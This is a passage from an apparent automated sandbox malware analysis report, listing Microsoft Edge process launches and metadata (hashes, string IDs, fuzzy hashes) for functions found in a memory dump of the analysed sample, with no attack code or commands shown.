                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=2108,i,1526023711057746171,13780567962873584071,262144 /prefetch:3
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:35
                                Start time:02:43:02
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:36
                                Start time:02:43:03
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=604 --field-trial-handle=1524,i,17359145505352969996,18071872945210523971,262144 /prefetch:3
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FFD9B8B35C0 Relevance: 4.4, Strings: 2, Instructions: 1867COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "I_H$(
                                  • API String ID: 0-2281682294
                                  • Opcode ID: 038855735f5c5d98384850b3f8bfd5c359c65281b62ab817aa94511d577a2514
                                  • Instruction ID: 7e5f754dca859d3b727be9a372981a3af7729968b07fbed487db63e211110251
                                  • Opcode Fuzzy Hash: 038855735f5c5d98384850b3f8bfd5c359c65281b62ab817aa94511d577a2514
                                  • Instruction Fuzzy Hash: 4FD2517071DA498FDBACEB58C4A5AA5B7E1FFA8300F11456ED04EC72A2DE34E941CB41
                                  Function 00007FFD9B8B2840 Relevance: 1.7, Instructions: 1673COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: adc24df28fe306e656615e4f5a1bc53940b5f4332825a1d1d78677d406968c22
                                  • Instruction ID: 60905c1fa380282fbdb687547a8faacfb6108364468653e195d032cd0252d881
                                  • Opcode Fuzzy Hash: adc24df28fe306e656615e4f5a1bc53940b5f4332825a1d1d78677d406968c22
                                  • Instruction Fuzzy Hash: 7CB2D6B1B1A94E4FEBA8EB6C9465A7473D1EF58300B1601BBD44DC72A2DF24FD468780
                                  Function 00007FFD9B8B3588 Relevance: 1.2, Instructions: 1162COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abd388e9e4306f83d5d372ac2a30963b361b1f7b106373dd794a80f098df8265
                                  • Instruction ID: ad99062ad111fffb2fccd9d8312951a3729171e8a2bfbe8adc767286f4c8f43f
                                  • Opcode Fuzzy Hash: abd388e9e4306f83d5d372ac2a30963b361b1f7b106373dd794a80f098df8265
                                  • Instruction Fuzzy Hash: 7072DF31B29A0E4FEBACEB58846277573D2FF9C700F1545B9D44EC72A2DE25E9428780
                                  Function 00007FFD9B8DB138 Relevance: .8, Instructions: 845COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 907200b8ab14ab939efd9a3d5aaff73c0d8714f4122310ca9fc5cad6e82e1adc
                                  • Instruction ID: a9065ff06a6852fca74134ad331ca3a65fc5c9ac1204e4a61911a29c5873baec
                                  • Opcode Fuzzy Hash: 907200b8ab14ab939efd9a3d5aaff73c0d8714f4122310ca9fc5cad6e82e1adc
                                  • Instruction Fuzzy Hash: 5A428330719E0A4FDBA8EB58D4A1A71B3E1FFA8315B15476EC04EC3996DE35F9428780
                                  Function 00007FFD9B8DB0C0 Relevance: .8, Instructions: 755COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c94769c765f193b6e79ad851ffefdfc001e0c803f656d3fb2b6064ced4e48084
                                  • Instruction ID: bd9b0006a2bffa9ac909ebdad3c5025a21bfdd521d7e3fb44622546fec277b44
                                  • Opcode Fuzzy Hash: c94769c765f193b6e79ad851ffefdfc001e0c803f656d3fb2b6064ced4e48084
                                  • Instruction Fuzzy Hash: A3423F30A19A0A8FDBA8DB58C4A5B7573E1FF98300F1142BED44ED72A5DE35E981CB41
                                  Function 00007FFD9B8B0925 Relevance: .6, Instructions: 624COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b870cb891389125a1530a093ced176d403b982db4cdc05272dece5dba8ba2e2d
                                  • Instruction ID: 4e37a62ad3038d48c191e71da219a460575424194b58b93964f287823a47138d
                                  • Opcode Fuzzy Hash: b870cb891389125a1530a093ced176d403b982db4cdc05272dece5dba8ba2e2d
                                  • Instruction Fuzzy Hash: 50029511B29A5D4FEBA8EB7C88717B966C2EF9C700F1541B9E01DC33E6DD28AC418791
                                  Function 00007FFD9B8B04A8 Relevance: .5, Instructions: 462COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a185a3026ec950b91c8240ab01527459e22d3a49cc801de96b74c29e8274e9ab
                                  • Instruction ID: d4a7f6aba5a161530be375ed7487ec0bbe8f806708e3b3cd5b383184930243fa
                                  • Opcode Fuzzy Hash: a185a3026ec950b91c8240ab01527459e22d3a49cc801de96b74c29e8274e9ab
                                  • Instruction Fuzzy Hash: 5AD16932B1DA5A4FEB5CEB7C84A55B537D1EFA9300B1500BED04ECB2E2DD25AD428780
                                  Function 00007FFD9B8B041B Relevance: .4, Instructions: 368COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16bd819e48adc9363e3af12c4b975932292f787028b36227b24ddf2ffaff95e6
                                  • Instruction ID: 3922d5baaef0706b21f59a009884e2c349284e328b763c9d85b3a5f6f43fd95c
                                  • Opcode Fuzzy Hash: 16bd819e48adc9363e3af12c4b975932292f787028b36227b24ddf2ffaff95e6
                                  • Instruction Fuzzy Hash: 78B16A3271DA854FE75DAB7888655B53BD1EF6A344B0A40BFD049CB1F3ED14AD028780
                                  Function 00007FFD9B8B7A88 Relevance: 3.1, Strings: 2, Instructions: 581COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: _$d
                                  • API String ID: 0-597095544
                                  • Opcode ID: 685f2e7bb78c33bc828ea0457f516fbb0414395f3f6ab92b0f8c87778bb29c7a
                                  • Instruction ID: 5036eb4d6c075ad74a99cc2ae3443e0f68b23032998e41f3ec88d80ccb70310b
                                  • Opcode Fuzzy Hash: 685f2e7bb78c33bc828ea0457f516fbb0414395f3f6ab92b0f8c87778bb29c7a
                                  • Instruction Fuzzy Hash: 0F02C270618B4A8FD768EF18D491A75B3E1FF98310F14467ED09EC3696DA35B882CB81
                                  Function 00007FFD9B8B2B78 Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 1$m
                                  • API String ID: 0-402893558
                                  • Opcode ID: 28bea6ed6cc45c21d907903bbf3b4bb04cd3f6680d42966dbc92ad4af38ac472
                                  • Instruction ID: 4d6e634d1389cbc0af23cb0144cef27946f8807fce4d757e90b48cbe262e2eb3
                                  • Opcode Fuzzy Hash: 28bea6ed6cc45c21d907903bbf3b4bb04cd3f6680d42966dbc92ad4af38ac472
                                  • Instruction Fuzzy Hash: 33E1F7B1A197494FE799EB6888657A577E1FF59300F1001FEE05DC71E2DE346A82CB01
                                  Function 00007FFD9B8B16F5 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +L_^$-L_^
                                  • API String ID: 0-3589249088
                                  • Opcode ID: 4152a20d5f99b25ff38a0e8a7310e33c16810d9025a189eca3ce98e547a0ab22
                                  • Instruction ID: 313d50555d7cb05b74a5949aaf441a98a2c6e9f6bb5a3bc96eecc867b5194c21
                                  • Opcode Fuzzy Hash: 4152a20d5f99b25ff38a0e8a7310e33c16810d9025a189eca3ce98e547a0ab22
                                  • Instruction Fuzzy Hash: 0391A063B1E7E60BE32567BCBC251F93B90EF45364B0841FBD0988B0EBED55650682C1
                                  Function 00007FFD9B8B06FA Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: =L_^$L_^
                                  • API String ID: 0-1704606949
                                  • Opcode ID: 8e3c07192a8ed9218abbd3d1e3ddc62330905e8a7af9fc08c604a0ebecd7ffe6
                                  • Instruction ID: 893bd6fa2855330715da3d0795b1f2da231c3ad5817bb138a38d149b78d25937
                                  • Opcode Fuzzy Hash: 8e3c07192a8ed9218abbd3d1e3ddc62330905e8a7af9fc08c604a0ebecd7ffe6
                                  • Instruction Fuzzy Hash: 533159B7B195264BE32926ADBC662FD37C0EF44368F0401BBD199C7193EE14A94996C0
                                  Function 00007FFD9B8DB128 Relevance: 1.9, Strings: 1, Instructions: 695COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "sx
                                  • API String ID: 0-2205791524
                                  • Opcode ID: a513ad83de31a0c1cfafb31e9887cb5cc9b4a635e42b5cdcb8e2e16048426272
                                  • Instruction ID: 60bbbd5662567527ccdfb67c935eb6001c0a9191bf48af6b5a1fef5cec2471c5
                                  • Opcode Fuzzy Hash: a513ad83de31a0c1cfafb31e9887cb5cc9b4a635e42b5cdcb8e2e16048426272
                                  • Instruction Fuzzy Hash: 3E221731709A1E8FE764EB68D464BE57791EF98314F1542BBC04DCB1D2DA29F886CB80
                                  Function 00007FFD9B9C060B Relevance: 1.7, Strings: 1, Instructions: 486COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1916155425.00007FFD9B9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b9c0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: A
                                  • API String ID: 0-3554254475
                                  • Opcode ID: 5a7662ce1edfdc8ed4688ba609d53c7cfd258e041b0f41bc89c8e67b8dea3333
                                  • Instruction ID: 5c1aa638bb3323070ece599dba2a8d0475aca619deec4715643f2bad4b6a34b6
                                  • Opcode Fuzzy Hash: 5a7662ce1edfdc8ed4688ba609d53c7cfd258e041b0f41bc89c8e67b8dea3333
                                  • Instruction Fuzzy Hash: 48F1BA7291E78A4FEB65EB28C8655B47BE0FF55700F1601BED08DCB0A3DB246909CB81
                                  Function 00007FFD9B8B7A78 Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CL_L
                                  • API String ID: 0-2469138507
                                  • Opcode ID: 12b72b81f5f695b49b77f13fb59a6d089c8d45303683f0a1f62e18edb5c8c037
                                  • Instruction ID: 65a0439d0ca9c2da596ff5af014c793a49b78217e4b6daf494dc79e22d5574d4
                                  • Opcode Fuzzy Hash: 12b72b81f5f695b49b77f13fb59a6d089c8d45303683f0a1f62e18edb5c8c037
                                  • Instruction Fuzzy Hash: 1391667161EB494FE768EB5898968B577E0EB59320B1501BFD48AC32B3D935B803C381
                                  Function 00007FFD9B8B1750 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +L_^
                                  • API String ID: 0-2651307759
                                  • Opcode ID: e9b5628de14e845734b3d29dde6031c805d175c863ed61d4cf2a9552f4d6918a
                                  • Instruction ID: 4ca8e710bd4baf613de4608ecf9c544d5963e366911aa24eac9afcdd84587119
                                  • Opcode Fuzzy Hash: e9b5628de14e845734b3d29dde6031c805d175c863ed61d4cf2a9552f4d6918a
                                  • Instruction Fuzzy Hash: EE815B53B1F7E60BE32567BC7C251F93B90EF463A4B0841FBD4988A0EBEC55690682C1
                                  Function 00007FFD9B8B1778 Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +L_^
                                  • API String ID: 0-2651307759
                                  • Opcode ID: 958214853637e252b105e25872fdd803c70c2e8607c6a92f8ed06fafe06b0847
                                  • Instruction ID: 0c8c6899b7bdfef1f2deb461eecc24512599c943958d83ccf5a58fac17900f20
                                  • Opcode Fuzzy Hash: 958214853637e252b105e25872fdd803c70c2e8607c6a92f8ed06fafe06b0847
                                  • Instruction Fuzzy Hash: 6A815A53B1F7E60BE32567BC7C251B93B90EF463A4B0941FBD4988B0EBEC55690682C1
                                  Function 00007FFD9B8B2630 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: YH_L
                                  • API String ID: 0-2877362028
                                  • Opcode ID: ef5ecb07b75cd9c7217462729da75914093e7f85e1da18870707129a4a4cf31c
                                  • Instruction ID: 991cdd13aeaf19cab36cd02fbbddcdf90b2077e27afdd2bda27f2b7af23fdc33
                                  • Opcode Fuzzy Hash: ef5ecb07b75cd9c7217462729da75914093e7f85e1da18870707129a4a4cf31c
                                  • Instruction Fuzzy Hash: 91619131B1DA0E4FDB78EB98D4A897577D0EB99310B1505BAD05DC32A2D925ED828B80
                                  Function 00007FFD9B8BAD60 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: vK_L
                                  • API String ID: 0-1368788573
                                  • Opcode ID: d4e438c0509cc90b8c0c1770bdd9a1889ae4dbc8856333a6d484ef6e27c2c763
                                  • Instruction ID: d3d3a24308a839e72ff81af7730cb3d2fd0f944a5c810ac319931a7dc9f519b9
                                  • Opcode Fuzzy Hash: d4e438c0509cc90b8c0c1770bdd9a1889ae4dbc8856333a6d484ef6e27c2c763
                                  • Instruction Fuzzy Hash: 6551063270DE1D5FE7A8EA3C986966477D1EB9D35071501FBE00DCB2A2ED21AC468780
                                  Function 00007FFD9B8DB080 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: hI_H
                                  • API String ID: 0-3854122630
                                  • Opcode ID: f537054d7a49df1109f648c449cc6b9961fde651ce11398143d3f7d52f8541d1
                                  • Instruction ID: 6b79d8317ae49a50cc434f4b73805aac36177ddfdf94a561915a80b85a15407e
                                  • Opcode Fuzzy Hash: f537054d7a49df1109f648c449cc6b9961fde651ce11398143d3f7d52f8541d1
                                  • Instruction Fuzzy Hash: 14519571A18F494FD76CEB288455AB2B7D1EFA8350F0446BFD09EC32A6EE34B5028741
                                  Function 00007FFD9B8BAB65 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: yK_L
                                  • API String ID: 0-167058955
                                  • Opcode ID: 654a7f2aa78e885ade1e72c954dda5b955aefc622cca92e00b9949bbd05de8ea
                                  • Instruction ID: 674cc705a05e79e1c4138f83aa482a5e6a64f12cef2ed329ff2783fbbee7fcfc
                                  • Opcode Fuzzy Hash: 654a7f2aa78e885ade1e72c954dda5b955aefc622cca92e00b9949bbd05de8ea
                                  • Instruction Fuzzy Hash: FCF0D622B1DD2E0BD67CA75C74211A9B2C1EB5C31070001AED45EC32DBDD24AD4246C5
                                  Function 00007FFD9B8BAA69 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: zK_L
                                  • API String ID: 0-457224677
                                  • Opcode ID: fc1c7d56f09b1008295e031906ea28bc765fc0367a485eb4d2c3f54a72532ed2
                                  • Instruction ID: 4f5f8b8825acb02d179ccf5a158f1cc91e3c3aa984412f53191f6e119309e9ec
                                  • Opcode Fuzzy Hash: fc1c7d56f09b1008295e031906ea28bc765fc0367a485eb4d2c3f54a72532ed2
                                  • Instruction Fuzzy Hash: 1AF08122B1DD2E0BD67CAA6C74611B9A3C1EB5C36075041AFE45EC329BED28AD4246C5
                                  Function 00007FFD9B8BA964 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: {K_L
                                  • API String ID: 0-2751256192
                                  • Opcode ID: b7d59f5fb9a4a28bc42ddabe78735c7c115e247c26ff3fb2678ce0bff18542c5
                                  • Instruction ID: 915462607b7f58fbe8d775726f50afd02ae936a27ca40980ef488e975ab787df
                                  • Opcode Fuzzy Hash: b7d59f5fb9a4a28bc42ddabe78735c7c115e247c26ff3fb2678ce0bff18542c5
                                  • Instruction Fuzzy Hash: 2EF0AD22B0DE2E0AD67CAA5870601B9A2C1EB5C32071001AED45EC329BDD28A94246C5
                                  Function 00007FFD9B8B169F Relevance: 1.0, Instructions: 1012COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a076e595de43e390dfe2e4b2b5b32fac8a9559e5622f7b0c993e4ffe96799dfc
                                  • Instruction ID: b41186a2e88c315d37b81c2b080e174ae7f8a37c3f5c128187502cd5166e1893
                                  • Opcode Fuzzy Hash: a076e595de43e390dfe2e4b2b5b32fac8a9559e5622f7b0c993e4ffe96799dfc
                                  • Instruction Fuzzy Hash: D85215B2B0EE4E4FEBA9EB6C947167437D2EF98340B0941BBD04DC71A6DD25AD068740
                                  Function 00007FFD9B8B27DF Relevance: .8, Instructions: 848COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 225a81548a659e360d5023fc82ccb9d65576b9e39c555df47bc3d725d5919fea
                                  • Instruction ID: 6afdac2b054eb996c1c7bf6133a633e8063202feeee1022242b7234dd0ccd751
                                  • Opcode Fuzzy Hash: 225a81548a659e360d5023fc82ccb9d65576b9e39c555df47bc3d725d5919fea
                                  • Instruction Fuzzy Hash: CB429B7070990D8FEBA8EF6C94A4B7577E1FF58300F0501BAE44DCB2A6DA24ED458B81
                                  Function 00007FFD9B8CD5A0 Relevance: .8, Instructions: 778COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb2502e867af20befe43169bea7847df01eb5615b9c3a46aa68f1a10e9ea3b95
                                  • Instruction ID: d738684818cfdc34f6afb5055d49034f17a4698f5d7fee094128cc2d94f6b70d
                                  • Opcode Fuzzy Hash: fb2502e867af20befe43169bea7847df01eb5615b9c3a46aa68f1a10e9ea3b95
                                  • Instruction Fuzzy Hash: CA229D6171994E4FEBA4FB2C9468A7477D2EFA934070640FBE44DC72AADE24EC468740
                                  Function 00007FFD9B8DB0D0 Relevance: .7, Instructions: 676COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 225097bb61c3a084206510607f292c51eb185028bfab6d69ff5fcc7eafe9ca1a
                                  • Instruction ID: b0d403611e8c42121aad9170e1cb559ba6c793ec65d5fb37c5132d1edd9b374a
                                  • Opcode Fuzzy Hash: 225097bb61c3a084206510607f292c51eb185028bfab6d69ff5fcc7eafe9ca1a
                                  • Instruction Fuzzy Hash: 9512A331708A4D8FDB98EB1CD4A5A7573D2EBA9300B1543BAD04DC72A6DE25EC42CB81
                                  Function 00007FFD9B8B2830 Relevance: .7, Instructions: 665COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
